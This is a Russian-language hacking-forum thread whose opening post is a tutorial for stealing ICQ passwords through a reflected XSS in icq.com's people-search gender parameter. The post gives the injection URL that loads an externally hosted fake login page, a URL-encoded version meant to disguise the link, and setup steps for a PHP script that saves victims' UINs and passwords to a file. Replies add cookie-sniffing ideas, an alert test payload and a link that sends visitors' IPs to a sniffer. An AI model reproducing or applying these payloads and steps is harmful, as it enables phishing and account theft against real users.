![]() |
Заходим в Icq через Xss
Заходим в Icq через Xss В этой статье я расскажу, как можно использовать уязвимость XSS на сайте ICQ.com. Всем известно, что через фейк можно угнать icq, но далеко не все станут заходить по ссылке vasya.com/fake.php. Возникает вопрос, можно ли сделать так, чтобы фейк был на ICQ.com? Ответ простой - да, и не сложно. ...Немного теории... Нам понадобится: 1. Хост с поддержкой PHP (платный или бесплатный) 2. Уязвимость (XSS) 3. Два скрипта : 1. ФейкУязвимость ICQ.com - файл icq.com/people/ уязвимое поле gender, вот урл: http://icq.com/people/?people_search=1&searched=1&gender=[xss] Фейк получился у меня очень большой и не поместился в сообщение, поэтому скачать =) Сохранялка пароля (login.php) очень простая PHP код:
...От теории к практике... Заливаем файл login.php на хост с поддержкой PHP. Приётся немного подкорректировать фейк (script.js). Измените содержание переменной $fake (http://site/karma/login.php) на урл до login.php. Ну и собственно заливаем его туда же. Теперь нам надо только составить урл уязвимости. Открываем http://icq.com/people/?people_search=1&searched=1&gender=[xss], но вместо [xss] напишем к примеру <xss_test>, теперь видим, что баг находится внутри скрипта: Код:
<script type="text/javascript" language="Javascript"> Код:
<script type="text/javascript" language="Javascript"> http://icq.com/people/?people_search=1&searched=1&gender=1;</script><script src="путь_до_фейка"></script><script>// Не очень красиво, согласитесь? Есть множество програм/тулз, которые маскируют ссылку, я выбрал способ - с помощью urlencode (в PHP). Кто не знает, где найти маскировщик, юзайте мой (вписываете этот ява скрипт код и Url будет маскировкой). У нас получится урл типо этого: http://icq.com/people/?people_search=1&searched=1&gender=%31%3b%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%7 0%74%20%73%72%63%3d%22%ef%f3%f2%fc%5f%e4%ee%5f%f4% e5%e9%ea%e0%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73 %63%72%69%70%74%3e%2f%2f Не супер секретная ссылка, но это, всё что можно сделать =) Ах да, и ещё к сожалению, она не будет работать в осле, не знаю почему.. Теперь можете попробывать ввеси уин и пароль, и когда нажмёте submit, ваши данные сохранятся в файл, указанный в login.php (по умолчанию - icq.txt), а вы, как ни в чём не бывало, перейдёте на http://icq.com. Вы так же можете очищать этот файл, зайдя на login.php?delete=ok. P.S. Thx 2 inv за идею =) P.P.S. Нет, я не увлёкся взломом ICQ, я просто решил поведать новичкам о том, как сделать фейк ICQ.com на самом же ICQ.com. |
возможно фейк будет дописан
просьба не кидаться колкими словечками в Nomer1=) |
NoScript отфильтровал нежелательную XSS отаку =)
Спасиб, + |
Что-то не работает у меня.
Должно появляться меню ввода что ли? А куки можно стырить? =) |
Цитата:
|
ну это уже разжовано, а хсс можно было взять и в статье уязвимостей, так что зря как статью, пихнул бы сразу в пассивные хсс
|
ну на данный момент актуально, но ведь никто не знает сколько проживёт Xss =)
|
Цитата:
по идею тебе должно прийти коокие файл на сниффер. Кстати искомый алерт ни в опере ни в осле, что означает и не в фиреворксе не работает , вызывая в осле лишь ошибку =\ -) Кстати Номерьчег, а ты сам тестил?) и гиде файл-фейк? -) |
%31%3b%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%7 0%74%20%73%72%63%3d%22%ef%f3%f2%fc%5f%e4%ee%5f%f4% e5%e9%ea%e0%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73 %63%72%69%70%74%3e%2f%2f
Sn@k3 код страницы посмотри потом поймешь над кем надо смеяться=)(я тоже сначала не вкурил) |
Цитата:
http://icq.com/people/?people_search=1&searched=1&gender=1;</script><script>alert("XSS")</script> |
ы ну да) да всровно кули толку на опере не утянешь, а в осле в основе сидят не просвященные с кривыми девятками, ну если тока пиарить по чатам бородина, ибо там сто пудов придеца юзать осла
|
раскрывал тему 2 года назад: http://www.xakep.ru/magazine/xa/083/060/1.asp . Даже конкурс в номере, который мы с Шанкаром прошли, точнее я помог ему пройти на данном тапе, построили по мотивам данной темы. Кроме 9-ок между прочим ничего и не ловится.
|
в файле script.js смысл сначало очищать document.body.innerHTML а потом через document.write() писать, есле можно сразу присвить значение document.body.innerHTML и все)
а так норм. |
Вторичный до мозга костей метод. Единственная ценность статьи - готовый фейк
|
Цитата:
Цитата:
|
А вот это:
_http://www.icq.com/greetings/cards/139125/krl5l551/view/ отсылает IP на снифер ачата, оч удуобно, т.к. урл беспалевный и его легче вкрячить, чем вышеописанное |
хм ... создал диру /karma , туда login.php и script.js поместил, в script.js указал путь
Цитата:
Цитата:
|
Цитата:
тоже самое ... |
Цитата:
пассивные XSS на icq.com, это далеко не чудеса, их там много, как и почти везде вот допустим это демонстрирует более изящьный метод получения паролей: [удалил, повесил снифф] пример взят из статьи hidden`а, сам не стал писать, сразу же скажу для тех кто боится, что ничего там не сохраняется, а выводится на экран |
Цитата:
|
Цитата:
|
старый фокус с бейсик авторизацией.. незнаю как много людей на это поведеться..
|
Цитата:
Сайт icq не принимает файл. Либо сообщение проверить формат, либо "no image format (gif, jpg, png)" |
Цитата:
|
Цитата:
|
Цитата:
|
| Время: 03:49 |